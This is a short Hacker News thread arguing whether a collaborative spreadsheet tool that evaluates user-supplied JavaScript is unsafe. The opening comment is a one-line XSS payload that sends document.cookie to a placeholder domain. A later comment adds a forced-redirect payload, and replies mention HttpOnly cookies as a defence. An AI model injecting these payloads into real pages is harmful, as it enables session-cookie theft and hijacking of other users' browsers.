Y
Hacker News
new
|
ask
|
show
|
jobs
by
araskoktas
4606 days ago
document.write('<img src="somedomain.com/?'+document.cookie);
2 comments
cosarara97
4606 days ago
But you'd need to send a spreadsheet with that to the victim.
link
araskoktas
4606 days ago
Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.
link
genericacct
4606 days ago
have you heard of the HttpOnly attribute for cookies?
link
araskoktas
4606 days ago
good, send HttpOnly cookies and solve that problem. window.location.href='
http://www.redt*be.com
'; -- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.
link
genericacct
4606 days ago
I most definitely will. and if my users want to browse your favorite porn site i don't see why i shouldn't let them..
link